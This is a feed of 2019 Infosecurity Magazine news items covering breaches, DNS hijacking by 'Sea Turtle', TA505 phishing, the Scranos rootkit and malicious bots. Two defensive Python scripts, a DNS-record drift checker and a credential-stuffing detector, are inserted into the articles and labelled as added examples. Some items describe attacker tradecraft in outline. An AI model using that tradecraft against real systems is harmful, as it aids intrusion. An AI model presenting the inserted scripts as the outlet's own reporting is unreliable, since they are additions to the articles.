Cyber Risk News

Cyber-Attack Knocks the Weather Channel Off the Air

Info Security - Fri, 04/19/2019 - 14:31

The Weather Channel, based in Atlanta, Georgia, has been hit with a cyber-attack that knocked it off the air for 90 minutes. 

On April 18, 2019, the organization took to its Twitter channel to confirm that it had been hit by a "malicious software attack" on its network, but as of press time it had not released any specifics on the attack itself. When the AMHQ show should have started, viewers instead saw taped programming (Heavy Rescue). AMHQ's Twitter feed also confirmed that it was "experiencing technical difficulties."

Around 90 minutes later, the show returned with its anchors informing viewers of the cyber incident.

"The Weather Channel, sadly, has been the victim of a malicious software attack today," said anchor Jim Cantore.

"Yes, and it has affected our ability to bring you your weather information," added anchor Stephanie Abrams. "So we just wanted to say thank you again for your patience and we want to get right to today's severe weather."

While attacks on television networks do not always make mainstream news, many countries have fallen victim to them. In February 2018, a cyber-attack on the PyeongChang Olympic Games, attributed to Russia, took the official Olympic website offline for 12 hours and disrupted Wi-Fi and televisions at the PyeongChang Olympic stadium.

Also, in October 2018, the National Cyber Security Centre accused Russia's military intelligence services of targeting firms in Russia and Ukraine, the US Democratic Party and a small TV network in the UK.

Categories: Cyber Risk News

Facebook Uploaded 1.5 Million Email Contacts Without Consent

Info Security - Fri, 04/19/2019 - 14:07

Since 2016, Facebook has reportedly harvested email contacts of 1.5 million users without their consent. According to Business Insider, the media outlet that broke the story, the company had been collecting the contact lists of new users since May 2016. 

In a statement, Facebook confirmed that it had been unintentionally uploading this data when people were verifying their accounts. 

"Last month we stopped offering email password verification as an option for people verifying their account when signing up for Facebook for the first time," said the statement. "When we looked into the steps people were going through to verify their accounts we found that in some cases people's email contacts were also unintentionally uploaded to Facebook when they created their account.

"We estimate that up to 1.5 million people's email contacts may have been uploaded. These contacts were not shared with anyone and we're deleting them. We've fixed the underlying issue and are notifying people whose contacts were imported. People can also review and manage the contacts they share with Facebook in their settings."

According to Business Insider, a security researcher realized that Facebook was asking some users to "enter their email passwords when they signed up for new accounts to verify their identities." The outlet then discovered that when a user entered their email password, "a message popped up saying it was 'importing' contacts, without asking for permission first."

A Facebook spokesperson also confirmed that these contacts were uploaded into Facebook's systems, where they were used to build "Facebook's web of social connections" and recommend friends. 

It is not known whether these contacts were also used for ad-targeting purposes, as in the Cambridge Analytica scandal that happened last year. That exposé, published by The Observer, led to Facebook having to answer questions from the US Senate and the UK government.

Infosecurity Magazine reported that at the beginning of April, over half a billion personal Facebook records were publicly exposed to the internet by two third-party app developers. UpGuard claimed to have found the two datasets stored in Amazon S3 buckets, which were configured to allow public download of files.

“The data exposed in each of these sets would not exist without Facebook, yet these data sets are no longer under Facebook’s control. In each case, the Facebook platform facilitated the collection of data about individuals and its transfer to third parties, who became responsible for its security,” explained UpGuard.

In regards to the latest data mishap, Facebook plans to notify the 1.5 million users affected and delete their contacts from the company's systems.

Categories: Cyber Risk News

LinkedIn Data Found in Unsecured Databases

Info Security - Thu, 04/18/2019 - 17:44

A security researcher identified eight unsecured databases that held "approximately 60 million records of LinkedIn user information."

The researcher, Sanyam Jain, works with GDI Foundation, a nonprofit organization with a mission to "defend the free and open Internet by trying to make it safer." Jain contacted Bleeping Computer when he noticed "something strange": unsecured databases containing the LinkedIn data were "appearing and disappearing from the Internet under different IP addresses."

While the majority of the LinkedIn data was reportedly public, some of the data contained email addresses.

"According to my analysis the data has been removed every day and loaded on another IP. After some time the database becomes either inaccessible or I can no longer connect to the particular IP, which makes me think it was secured. It is very strange," Jain told Bleeping Computer. The total size of all of the databases was 229 GB, with each database ranging from 25 GB to 32 GB.

As an experiment, Bleeping Computer editor Lawrence Abrams asked Jain to pull his record from one of the databases and review it. According to the article, Abrams found the data contained in the record included "his LinkedIn profile information, including IDs, profile URLs, work history, education history, location, listed skills, other social profiles, and the last time the profile was updated."

The email address Abrams used when he registered his LinkedIn account was also included. The editor doesn't know how the information got onto this database as he "always had the LinkedIn privacy setting configured to not publicly display his email address."

Each profile also contains what appear to be internal values that describe the type of LinkedIn subscription the user has and whether they use a particular email provider, according to Bleeping Computer. These values were labeled "isProfessional," "isPersonal," "isGmail," "isHotmail" and "isOutlook."

Bleeping Computer contacted Amazon, which was hosting the databases, and as of April 15, 2019, the databases had been secured and were no longer accessible via the internet.

LinkedIn's Paul Rockwell, head of trust and safety, told the website: "We are aware of claims of a scraped LinkedIn database. Our investigation indicates that a third-party company exposed a set of data aggregated from LinkedIn public profiles, as well as other, non-LinkedIn sources. We have no indication that LinkedIn has been breached."

LinkedIn also told the outlet that in some cases an email address could be public and provided a link to a privacy page that allows users to configure who can see a profile's email address.

Categories: Cyber Risk News

TA505 Targets Financial and Retail Using 'Undetectable' Methods

Info Security - Thu, 04/18/2019 - 17:00

A financially motivated gang is targeting retailers and financial institutions around the world using remote access software. 

CyberInt's Research Lab has found that TA505 is using these tactics alongside an off-the-shelf commercial remote administration tool developed by the Russia-based company TektonIT. The group was behind attacks on the global financial industry between December 2018 and February 2019 and is using the same techniques, according to the company.

Proofpoint says that according to its actor profile, "TA505 is responsible for the largest malicious spam campaigns we have ever observed, distributing instances of the Dridex banking Trojan, Locky ransomware, Jaff ransomware, The Trick banking Trojan and several others in very high volumes."

"Although they are using phishing and social engineering to get the software into the organisations, once it's installed, it's virtually undetectable by traditional threat protection systems because it's legitimate software," says Adi Peretz, senior strategic consultant and head of research at CyberInt. "They are still very much active and this is only the beginning of our deep-dive investigation."

According to the report, TA505 turned to payloads such as stealer backdoors and remote access Trojans following the decline in the popularity of ransomware, likely due to mitigation tactics. Because the remote administration tool is legitimate software, its presence throws defenders off the scent and lets the group operate undetected.

"Tried and tested attack patterns appear to be consistent across these recently observed campaigns and commence with the delivery of phishing emails that have lure document attachments," says the CyberInt report. "Utilising legitimate logos, language and terminology consistent with common business interactions or the target organization, the email encourages the potential victim to open the lure document attachment which in turn instructs them to disable security controls within Microsoft Office to allow a nefarious macro to be executed."

The report goes on to say that the macro, if executed, subsequently attempts to download "malicious payloads from the threat actor's C2 infrastructure that in most cases also masquerades as, or mimics, legitimate-looking domains such as using names and misspellings related to 'Cloud', 'Microsoft Office 365' or 'Security.'"

Categories: Cyber Risk News

Fraudsters Exploit Sympathies Surrounding Notre Dame Tragedy

Info Security - Thu, 04/18/2019 - 16:22

Fraudsters are preying on the goodwill of people everywhere by using the tragic fire of Notre Dame to their advantage.

According to research by security company ZeroFOX, cyber-criminals are "spreading misinformation about the disaster," which includes fake donation pages and launching new phishing campaigns. The company says in a blog post that "preying on the sympathy of those wanting to help victims is nothing new, but the technical underpinnings of the internet and its social media platforms allow hackers and spammers to scale their efforts at an unprecedented rate."

The blog goes on to explain that these threat actors use a variety of tactics, such as:

  • Using bots on Twitter to spread donation links leading to spam or malware sites
  • Impersonating websites and social media accounts of legitimate charity organizations
  • Sending fraudulent charity emails with bad links or attachments
  • Registering domains related to the disaster
  • Creating fake donation campaigns on crowdfunding sites
  • Using fraud messaging that includes vague victim stories, pressure to act quickly or promises of high payouts for a company involved in cleanup

Most worryingly, the crowdfunding tactics may be the most effective of all. Raising money this way to help people in need is increasingly common, especially around tragic events such as this, and sites such as JustGiving can be copied to set up fake donation pages. "People looking to donate quickly may easily mistake a fraudulent donation page for the real page – losing their money and putting money in the hands of bad actors, not those in need," says the blog post.

One example the ZeroFox Alpha Team found was on, where an anonymous user created this crowdfunding campaign supporting “Friends of Notre-Dame De Paris Inc.” "Based on the information provided (and lack of details) in the post, any supporter should be hesitant to donate to this particular fundraising effort," the post goes on to say. 

Another tactic targets social media users who follow trending hashtags. 

"In the case of the Notre Dame disaster, we have seen multiple instances of posters using the hashtag #NotreDameCathedralFire looking to capitalize on the tragedy," explains the post.

"[This example of one such post] is looking to sell 'services' using the Notre Dame fire hashtag." Users need to be careful, it goes on, of any seller using hijacked hashtags, as they are "typically associated with scams and malicious links."

[Image caption: Example of potential crowdfunding scam – note the warning signs.]

When it comes to avoiding scams related to this disaster, ZeroFOX recommends the following:

  • Review suggestions from crowdfunding sites on how to identify legitimate campaigns.
  • Be cautious of unfamiliar individuals or organizations soliciting donations or investments through social media, email or phone.
  • Conduct thorough research on charity organizations and use a website that rates organizations, such as Charity Navigator or CharityWatch.
  • Be cautious of requests for donations or investments in cash, by gift card, or by wiring money, which are frequent methods of payment for scams.
  • Report potential scams to crowdfunding sites, and reach out for a potential refund in the case of a suspected scam.

Categories: Cyber Risk News

Cloud Security Spending Set to Top $12bn by 2023

Info Security - Thu, 04/18/2019 - 10:20

Global spending on cloud security is set to grow nearly 18% to reach $12.7bn by 2023, with protection for public cloud deployments prioritized over the coming years, according to a new report from Forrester.

Organizations spent $178bn on public cloud services last year, a figure that will grow to $236bn by 2020 — making security increasingly important to protect mission critical systems and sensitive data.

Infrastructure decision makers are particularly concerned about cyber risk, with over half (54%) implementing cloud solutions, the analyst claimed in its report, Forrester Analytics: Cloud Security Solutions Forecast, 2018 To 2023 (Global).

The sheer complexity of cloud deployments, often covering multiple providers and hybrid deployments, also requires enhanced security to monitor data, detect anomalies, and intercept threats.

Public cloud remains the biggest focus for security investment. Some $4bn was spent on public cloud native platform security in 2018, accounting for over 70% of total cloud security spend, and this will be the fastest-growing area to 2023, when it will reach $9.7bn, Forrester claimed.

The good news is that these efforts appear to be working: just 12% of breaches targeted public cloud environments, while 37% of global infrastructure decision makers cited improved security as an important reason to move to the public cloud, according to Forrester.

The analyst was also keen to point out that there’s no single solution which can meet all an organization’s cloud security needs.

As mentioned, public cloud native solutions are growing fastest. These cover areas like: data classification, categorization and segmentation; server access control; user IAM; encryption; and logging, auditing, and anomaly detection.

Then there are cloud workload solutions designed to centralize and automate cloud security across multiple platforms and environments. This market is set to grow at 17.3% CAGR to reach $1.9bn by 2023.

Finally, cloud security gateways succeed where traditional security tools fail by encrypting data before it’s sent to SaaS applications; detecting shadow IT; data loss prevention (DLP); malware detection; and cloud access anomaly detection.

Categories: Cyber Risk News

Dark Web Fraudsters Defraud Each Other with Fraud Guides

Info Security - Thu, 04/18/2019 - 09:43

Cyber-criminals are doing a roaring trade in “how-to” fraud guides for their fellow scammers, although many are out-of-date and incomplete, according to new dark web research from Terbium Labs.

The cyber-intelligence firm analyzed nearly 30,000 of these guides to compile its latest report, Fraud Guides 101: Dark Web Lessons on How to Defraud Companies and Exploit Data.

These online documents typically include instructions on specific fraud capabilities such as account takeover, phishing, cashing out, doxing, synthetic fraud, account creation and so on.

They could feature instructions, personal notes from the author on their experiences of what works and what doesn’t, social engineering and technical advice, and more.

However, while it appears to be an ominously thriving industry, it’s unclear exactly how much value these guides are offering to the typical fraudster.  

According to Terbium Labs, over a quarter (26%) of guides are more than a decade old, and there are more out there from 2010 than 2017 and 2018 combined.

“Any guidance or information from within a few years is bound to still be helpful for criminals looking to get started, but once we get five or 10 years out, the value certainly decreases,” Terbium Labs VP of research, Emily Wilson, told Infosecurity.

“If buyers think they’re getting the most up-to-date methods in these major fraud collections, they’re going to be surprised and disappointed. These collections represent the information gathered over a couple of decades, rather than a highly curated group of the most recent materials.”

What’s more, three-quarters (75%) of those analyzed were found to be duplicates which have simply been repackaged and resold, at an average of £6 each.

“What we see here is a criminal community gathering information over time, and then doing what vendors do best: repackaging it and reselling it under their own name, looking for a new way to turn a profit,” Wilson continued.

“These guides require little work to gather, and even less work to throw into a zip file and market under your own brand. They’re in business to make money, and what better way to make money than to repackage someone else’s work and pass it off as your own?”

In addition, some 11% of fraud guide purchases the researchers attempted to make on the dark web turned out to be scams, the report revealed.

However, despite all the scams and the old and incomplete data found in many guides, the info gathered by the dark web intelligence vendor could still be useful for organizations trying to get inside the fraudster’s head. It could even be used by risk teams to help evaluate current fraud controls and detection services, for example.

Terbium Labs also ran a check on the appearance of personal and financial information in the guides to see what was of greatest interest to fraudsters.

Surprisingly, email addresses came out top, ahead of payment card data and other PII, according to the report.

Categories: Cyber Risk News

DNS Hijackers Target Middle East Governments

Info Security - Thu, 04/18/2019 - 09:06

Security experts are warning of a new state-sponsored DNS hijacking campaign affecting at least 40 organizations across 13 countries.

Cisco Talos revealed in a blog post yesterday that the “Sea Turtle” campaign began back in January 2017 and has been active until the first quarter of this year, targeting mainly public and private sector organizations in the Middle East and North Africa.

Attackers sought first to gain DNS credentials from target organizations, either by exploiting known vulnerabilities or sending spear-phishing emails. They then typically used these log-ins to target the firm’s registrar, accessing their DNS records and modifying them to point users to a malicious server under the hackers’ control.

The group then set up a classic man-in-the-middle (MiTM) operation, impersonating legitimate services to harvest user credentials.

“Once these credentials were captured, the user would then be passed to the legitimate service. To evade detection, the actors performed ‘certificate impersonation,’ a technique in which the attacker obtained a certificate authority-signed X.509 certificate from another provider for the same domain imitating the one already used by the targeted organization,” explained Cisco.

“This tactic would make detecting the MitM attack more difficult, as a user's web browser would still display the expected "SSL padlock" in the URL bar.”

With access to the target’s network, the attackers then stole the organization’s SSL certificate, enabling them to perform more MiTM attacks to harvest other credentials, expanding their access. Stolen certs were used for just a day to maintain good OpSec.

Primary targets were military organizations, national security agencies, foreign affairs ministries and energy companies in Libya, Egypt, UAE, Cyprus, Lebanon, Iraq, Jordan, Turkey, Armenia, Syria and Albania.

Secondary targets, infiltrated to gain access to the former, were mainly based in the US and Sweden and included DNS infrastructure firms such as registrars, ISPs, telcos, and one registry. Swedish DNS firm Netnod was one of these.

“Notably, the threat actors were able to gain access to registrars that manage ccTLDs for Amnic, which is listed as the technical contact on IANA for the ccTLD .am,” Cisco continued. “Obtaining access to these ccTLD registrars would have allowed attackers to hijack any domain that used those ccTLDs.”

The firm warned that the group is highly capable and has continued in its operations, undeterred by media reports on some of its activity.

“Most traditional security products such as IDS and IPS systems are not designed to monitor and log DNS requests. The threat actors were able to achieve this level of success because the DNS domain space system added security into the equation as an afterthought. Had more ccTLDs implemented security features such as registrar locks, attackers would be unable to redirect the targeted domains,” it concluded.

“The threat actors also used an interesting technique called certificate impersonation. This technique was successful in part because the SSL certificates were created to provide confidentiality, not integrity. The attackers stole organizations' SSL certificates associated with security appliances such as ASA to obtain VPN credentials, allowing the actors to gain access to the targeted network.”

Cath Goulding, head of cybersecurity at .uk registry Nominet, claimed its infrastructure was secure thanks to it taking a layered approach.

“While two-factor authentication helps verify authenticity, Domain Lock is a tool by which registrars can literally ‘lock’ domains so that no changes can be made without thorough authentication of the domain name owner via 2FA. We are continually monitoring the situation, and would reassure the majority of consumers trying to access .UK domain names,” she said.

“For businesses that have their own DNS provisions, we would recommend checking your DNS settings manually to ensure they are still pointing to legitimate servers. The issue with this sort of attack is that it’s incredibly difficult to spot. We would recommend implementing stringent access protocols for your DNS settings, such as multi-factor authentication, as this additional layer of security makes it much harder for hackers to gain access to your systems.”

The group is not connected to the DNSpionage attacks revealed in November last year, according to Cisco.
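The manual check Nominet recommends above (confirming that DNS records still point at legitimate servers) and the registrar locks Cisco mentions can be turned into a repeatable script. The following Python is an added example, not code from the article, Cisco Talos or Nominet. The zone names, addresses and answer tables are constructed, and both the record lookup and the registrar status list are supplied by the caller so the logic runs offline; in production you would wire in a real resolver (for example dnspython's dns.resolver, queried through more than one upstream) and an RDAP or WHOIS client for the status codes.

```python
"""
Added example (not the article's, Cisco Talos's or Nominet's code): two
defender-side checks against the DNS-hijacking pattern described above.

  1. check_zone_records  - compare the NS/A/MX answers currently served for
                           a zone with a known-good baseline and report drift.
  2. unlocked_operations - confirm a domain's registrar status codes include
                           the update/transfer locks that block silent changes.

Lookups go through caller-supplied functions so this runs offline; all zone
names and addresses below are constructed (RFC 2606 / RFC 5737 ranges).
"""
from dataclasses import dataclass, field
from typing import Callable, Dict, Iterable, List, Set, Tuple

Baseline = Dict[Tuple[str, str], Set[str]]      # (zone, rrtype) -> expected rdata
Resolver = Callable[[str, str], Iterable[str]]  # (name, rrtype) -> observed rdata


@dataclass
class Drift:
    zone: str
    rrtype: str
    unexpected: Set[str] = field(default_factory=set)  # served, but not in baseline
    missing: Set[str] = field(default_factory=set)     # in baseline, but not served


def _norm(records: Iterable[str]) -> Set[str]:
    """Compare case-insensitively and ignore a trailing dot on names."""
    return {r.strip().lower().rstrip(".") for r in records}


def check_zone_records(baseline: Baseline, resolve: Resolver) -> List[Drift]:
    """Return one Drift per (zone, rrtype) whose live answer differs from the baseline."""
    findings: List[Drift] = []
    for (zone, rrtype), expected in sorted(baseline.items()):
        observed = _norm(resolve(zone, rrtype))
        wanted = _norm(expected)
        if observed != wanted:
            findings.append(Drift(zone, rrtype, observed - wanted, wanted - observed))
    return findings


# EPP status codes (as returned by WHOIS/RDAP) that block a given operation.
# Either the registrar-set (client*) or registry-set (server*) code suffices.
LOCKS = {
    "transfer": {"clienttransferprohibited", "servertransferprohibited"},
    "update": {"clientupdateprohibited", "serverupdateprohibited"},
}


def unlocked_operations(statuses: Iterable[str]) -> Set[str]:
    """Return the operations ('transfer', 'update') that no lock status protects.
    Accepts EPP spelling ('clientTransferProhibited') or RDAP phrasing
    ('client transfer prohibited')."""
    present = {s.replace(" ", "").lower() for s in statuses}
    return {op for op, codes in LOCKS.items() if not (codes & present)}


def report(findings: List[Drift]) -> List[str]:
    """Render findings as one line each, suitable for a ticket or alert."""
    return [f"{d.zone} {d.rrtype}: unexpected={sorted(d.unexpected)} "
            f"missing={sorted(d.missing)}" for d in findings]


# --- constructed sample data; no real zones or hosts are involved ---
BASELINE: Baseline = {
    ("example-corp.test", "NS"): {"ns1.example-corp.test.", "ns2.example-corp.test."},
    ("example-corp.test", "A"): {"203.0.113.10"},
    ("example-corp.test", "MX"): {"10 mail.example-corp.test."},
    ("vpn.example-corp.test", "A"): {"203.0.113.20"},
}

HEALTHY_ANSWERS = {
    ("example-corp.test", "NS"): ["ns1.example-corp.test.", "NS2.example-corp.test."],
    ("example-corp.test", "A"): ["203.0.113.10"],
    ("example-corp.test", "MX"): ["10 mail.example-corp.test."],
    ("vpn.example-corp.test", "A"): ["203.0.113.20"],
}

# The same zone after the kind of change the article describes: NS records
# altered at the registrar, and the VPN host resolving outside the baseline.
HIJACKED_ANSWERS = dict(HEALTHY_ANSWERS)
HIJACKED_ANSWERS[("example-corp.test", "NS")] = ["ns1.unrelated-host.test.", "ns2.unrelated-host.test."]
HIJACKED_ANSWERS[("vpn.example-corp.test", "A")] = ["198.51.100.7"]


def make_resolver(table: Dict[Tuple[str, str], List[str]]) -> Resolver:
    """Build an offline resolver from a constructed answer table."""
    return lambda name, rrtype: table.get((name, rrtype), [])


if __name__ == "__main__":
    for label, table in (("healthy", HEALTHY_ANSWERS), ("hijacked", HIJACKED_ANSWERS)):
        findings = check_zone_records(BASELINE, make_resolver(table))
        print(f"{label}: {'no drift' if not findings else 'DRIFT DETECTED'}")
        for line in report(findings):
            print("  " + line)
    print("unlocked operations:", unlocked_operations(["clientDeleteProhibited", "ok"]))
```

Run on a schedule, the drift check gives the early warning that the article says traditional IDS/IPS products do not provide; querying through several independent upstream resolvers (and comparing their answers with each other as well as with the baseline) also catches the case where only one resolution path has been tampered with. The lock check is worth running against every domain you own, not only the ones that host services, because the hijack described above started at the registrar rather than at the name servers.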

Categories: Cyber Risk News

DCMS Shares UK Journalists Emails, Potential GDPR Breach

Info Security - Wed, 04/17/2019 - 16:28

The government department that is responsible for implementing the General Data Protection Regulation (GDPR) has committed an email faux pas with UK journalists which could also mean it has broken its own rules. 

Flagged by Guardian journalist Alex Hern on Twitter, the email was regarding its announcement on age verification rules on online pornography. Hern tweeted: "DCMS has just announced that the porn filters are coming online on July 15, in an email that cc's every media and technology journalist in Britain." 

According to the Information Commissioner's Office (ICO)'s website, "The GDPR applies wherever you are processing ‘personal data.' If the email addresses make obvious the name, such as ',' GDPR will apply."

Furthermore, the GDPR protects people from being cold-emailed or spammed by requiring explicit consent from individuals. If anyone on the mailing list did not consent to being on it, there might be a breach.

What counts as consent?

  • Consent must be freely given; this means giving people genuine ongoing choice and control over how you use their data
  • Consent should be obvious and require a positive action to opt in. Consent requests must be prominent, unbundled from other terms and conditions, concise and easy to understand, and user-friendly
  • Consent must specifically cover the controller’s name, the purposes of the processing and the types of processing activity
  • You must make it easy for people to withdraw consent at any time they choose

While DCMS is a high-profile organization, breaches due to human error are not uncommon. In the last two years of reports of UK data breaches to the ICO, just 12% were the result of malicious attacks, according to Kroll. This means that 88% were the result of human error.

"Effective cybersecurity is not just about technology. Often, companies buy the latest software to protect themselves from hackers, but fail to instigate the data management processes and education of employees required to mitigate the risks," said Kroll managing director, Andrew Beckett, to Infosecurity Magazine in September 2018. "The majority of data breaches, and even many cyber-attacks, could be prevented by human vigilance or the implementation of relatively simple security procedures."

The ICO confirmed it was aware of the incident, commenting: "We are in contact with the Department for Digital, Culture, Media and Sport regarding today’s email incident."

Categories: Cyber Risk News

UK To Become First Country To Bring in Age-Verification for Online Pornography

Info Security - Wed, 04/17/2019 - 14:53

The UK will become "the first country in the world" to bring in age verification for online pornography, according to the Department for Digital, Culture, Media and Sport (DCMS). The measures, which come into force on July 15, 2019, mean that commercial providers of online pornography will be required by law to carry out robust age-verification checks on users to ensure they are 18 or over.

In its announcement this morning, the DCMS says "the move is backed by 88% of UK parents with children aged 7–17, who agree there should be robust age-verification controls in place to stop children seeing pornography online." It has also said that websites that fail to implement age-verification technology face having payment services withdrawn or being blocked for UK users.

Minister for digital Margot James said, "Adult content is currently far too easy for children to access online. The introduction of mandatory age-verification is a world-first, and we’ve taken the time to balance privacy concerns with the need to protect children from inappropriate content. We want the UK to be the safest place in the world to be online, and these new laws will help us achieve this."

The change in law is part of the government’s commitment to making the UK "the safest place in the world to be online, especially for children." It follows the publication of a whitepaper by the government department last week, which also referenced social media companies being more accountable for content on their sites.

The British Board of Film Classification (BBFC) will be responsible for ensuring compliance with the new laws.

Online pornography websites have also been a goldmine for stealing user credentials. In 2018, 850,000 attempts were made to steal porn credentials according to a report by Kaspersky Labs. The attacks had been focused on paid accounts for only two sites, Pornhub and XNXX.

Ransomware has also affected users of these sites, making underage users vulnerable. According to Kaspersky's report, ransomware poses as an application. Once in use it locks the screen of the device and shows a message stating that illegal content (usually child porn) has been detected on the device, and the device has been locked. In order to unlock the device, the victim has to pay a ransom.

Categories: Cyber Risk News

Scranos Goes Global After Targeting China

Info Security - Wed, 04/17/2019 - 14:04

A new password and data stealing operation that has been targeting China has started to infect users worldwide, according to Bitdefender Cyber Threat Intelligence Lab. 

Using a rootkit driver signed with a certificate believed to have been stolen, the attack is still a work in progress, with many components in an early stage of development, say the researchers behind the company's latest report, Inside Scranos – A Cross Platform, Rootkit-Enabled Spyware Operation.

"We discovered that the operators of this rootkit-enabled spyware are continuously testing new components on already-infected users and regularly making minor improvement to old components," according to the report. "The various components can serve different purposes or take different approaches to achieve their goals."

Some of these components identified include:

  • Extract cookies and steal login credentials from Google Chrome, Chromium, Mozilla Firefox, Opera, Microsoft Edge, Internet Explorer, Baidu Browser and Yandex Browser
  • Steal a user’s payment accounts from Facebook, Amazon and Airbnb webpages
  • Send friend requests to other accounts, from the user’s Facebook account
  • Send phishing messages to the victim’s Facebook friends containing malicious APKs used to infect Android users as well
  • Steal login credentials for the user’s account on Steam

Bitdefender's research reveals that the malware spreads via Trojanized applications "disguised as cracked software, or applications posing as legitimate software such as e-book readers, video players, drivers or even antimalware products." When executed, the rootkit driver is installed to cloak the malware and ensure persistence. The malware then phones home and is told what other components to download and install.

"Our telemetry shows the adware has a global presence, but it seems more prevalent in India, Romania, Brazil, France, Italy and Indonesia," continues the report. "All identified samples confirm that this operation is in a consolidation stage: the oldest samples identified date back to November 2018, with a massive spike in December and January. However, in March 2019, the command and control servers started pushing other strains of malware – a clear indicator that the network is now affiliated with third parties in pay-per-install schemes."

The rootkit driver, at the time the report was written, contains a valid digital signature with a certificate issued to Yun Yu Health Management Consulting (Shanghai) Co., Ltd.

"The most likely scenario is that an impersonator obtained this certificate fraudulently, even if the company is not a software vendor," the report deduces. 

The rootkit sets up and creates a device named \Device\VideoDriver and serves three main purposes, according to the report:

  1. Decrypts and injects the downloader in a svchost.exe process with system authority
  2. Deletes a specified file using low-level file system operations
  3. Registers an IRP_MJ_SHUTDOWN function which is used to ensure the persistence of this rootkit in the infected system by rewriting itself on disk and in the registry at every shutdown, in case it was deleted

Categories: Cyber Risk News

'Data trusts' can support competing interests, studies find - Wed, 04/17/2019 - 13:15
The conflicting interests different organisations have in using information can be managed through 'data trust' models, the Open Data Institute (ODI) has said at the end of a piloting scheme.
Categories: Cyber Risk News

Fifth of Web Traffic Comes from Malicious Bots

Info Security - Wed, 04/17/2019 - 09:43
Fifth of Web Traffic Comes from Malicious Bots

Around a fifth of all web traffic last year was linked to malicious bot activity, with financial services hit more than any other sector, according to Distil Networks.

The security vendor compiled its 2019 Bad Bot Report from analysis of a global network covering thousands of anonymized domains.

It claimed to have discovered hundreds of billions of “bad bot” requests across this network, enabling large-scale, automated malicious activity including: web scraping, competitive data mining, personal and financial data harvesting, brute-force login and digital ad fraud, spam, transaction fraud and more.

The report put bad bot traffic at 20.4% of all traffic. Although this was a slight drop from the previous year, nearly three-quarters (74%) of these bots were classified as “Advanced Persistent Bots” (APBs), which are able “to cycle through random IP addresses, enter through anonymous proxies, change their identities, and mimic human behavior.”

In terms of ISPs, bad bot traffic was most likely to originate from Amazon (18%), while geographically most of it originated in the US (53%), according to the report. However, Russia and Ukraine accounted for nearly half (48%) of the blocking requests made by Distil customers, given their notoriety.

Financial services had the highest percentage of malicious bot traffic (42%), thanks mainly to the uptick in credential stuffing designed to access and/or hijack user accounts. Between May and December 2018, Akamai tracked over a billion credential stuffing attempts against financial services firms.
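The credential-stuffing pattern described above, as an added example that is not from the Distil report or its tooling: two detectors run over constructed login events from a hypothetical auth service (the JSON field names, IP ranges and thresholds are assumptions). The first flags one source failing against many accounts, which any rate limiter can do; the second keys on the targeted account rather than the source IP, which is what catches the APB behaviour of cycling through proxies so that no single IP trips a threshold.

```python
"""Credential-stuffing detection over login events (added example, not from the
Distil report). Two detectors: a single source spraying many accounts, and many
rotating sources hitting the same account, which per-IP thresholds miss."""
import json
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample (not real telemetry): JSON-lines events from a hypothetical
# login service. Fields: ts, src_ip, user, result ("ok" or "fail").
SAMPLE_AUTH_LOG = "\n".join(
    # 198.51.100.7 sprays a leaked credential list: many accounts, all failures.
    [f'{{"ts":"2019-04-17T09:00:{i:02d}Z","src_ip":"198.51.100.7","user":"{u}","result":"fail"}}'
     for i, u in enumerate(["bob", "carol", "dave", "erin", "frank", "grace", "heidi"])]
    # Rotating proxies each try "ivan" or "judy" once: only one failure per IP.
    + [f'{{"ts":"2019-04-17T09:01:{i:02d}Z","src_ip":"203.0.113.{i + 1}","user":"{u}","result":"fail"}}'
       for i, u in enumerate(["ivan"] * 5 + ["judy"] * 2)]
    # A real user mistypes once, then logs in.
    + ['{"ts":"2019-04-17T09:02:00Z","src_ip":"192.0.2.10","user":"alice","result":"fail"}',
       '{"ts":"2019-04-17T09:02:05Z","src_ip":"192.0.2.10","user":"alice","result":"ok"}']
)


def parse_events(text):
    """Parse JSON-lines auth events; returns them sorted by time with 'ts' as datetime."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        e = json.loads(line)
        e["ts"] = datetime.strptime(e["ts"], "%Y-%m-%dT%H:%M:%SZ")
        events.append(e)
    return sorted(events, key=lambda e: e["ts"])


def _max_distinct_in_window(timed_values, window):
    """timed_values: [(ts, value)] sorted by ts. Largest number of distinct values
    seen within any span of length <= window (two-pointer sweep)."""
    best, j = 0, 0
    for i in range(len(timed_values)):
        while j < len(timed_values) and timed_values[j][0] - timed_values[i][0] <= window:
            j += 1
        best = max(best, len({v for _, v in timed_values[i:j]}))
    return best


def detect_single_source(events, window=timedelta(minutes=10), min_users=5, min_fail_ratio=0.8):
    """Flag source IPs that fail logins against many distinct accounts in one window."""
    fails_by_ip = defaultdict(list)            # ip -> [(ts, user)] for failures only
    totals = defaultdict(lambda: [0, 0])       # ip -> [attempts, failures]
    for e in events:
        totals[e["src_ip"]][0] += 1
        if e["result"] == "fail":
            totals[e["src_ip"]][1] += 1
            fails_by_ip[e["src_ip"]].append((e["ts"], e["user"]))
    hits = []
    for ip, fails in fails_by_ip.items():
        attempts, failures = totals[ip]
        n_users = _max_distinct_in_window(fails, window)
        if n_users >= min_users and failures / attempts >= min_fail_ratio:
            hits.append({"src_ip": ip, "distinct_users": n_users, "failures": failures})
    return hits


def detect_distributed(events, window=timedelta(minutes=10), min_ips=4):
    """Flag accounts receiving failed logins from many distinct IPs in one window.
    This is the view that catches proxy-rotating bots: each IP stays under any
    per-IP threshold, but the target account sees the whole campaign."""
    fails_by_user = defaultdict(list)          # user -> [(ts, src_ip)]
    for e in events:
        if e["result"] == "fail":
            fails_by_user[e["user"]].append((e["ts"], e["src_ip"]))
    hits = []
    for user, fails in fails_by_user.items():
        n_ips = _max_distinct_in_window(fails, window)
        if n_ips >= min_ips:
            hits.append({"user": user, "distinct_ips": n_ips})
    return hits


if __name__ == "__main__":
    evts = parse_events(SAMPLE_AUTH_LOG)
    print("single-source stuffing:", detect_single_source(evts))
    print("distributed stuffing:  ", detect_distributed(evts))
```

On the sample, the per-IP detector reports only 198.51.100.7, and the per-account detector reports only "ivan": the seven proxy IPs never exceed one failure each, so they are invisible to the first detector. Windows and thresholds here are placeholders; tune them against your own login volume and failure baseline, and feed the per-account hits into step-up authentication or a password-reset prompt rather than an IP block, since the IPs will have moved on.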

However, ticketing (39%), education (38%) and government (30%) were also badly affected. Government is unusual in that attackers' motivations in this sector are not solely financial: bots are also used for election interference, for example by tampering with voter registration accounts.

“Bot operators and bot defenders are playing an incessant game of cat and mouse, and techniques used today, such as mimicking mouse movements, are more human-like than ever before,” said Tiffany Olson Kleemann, CEO of Distil Networks.

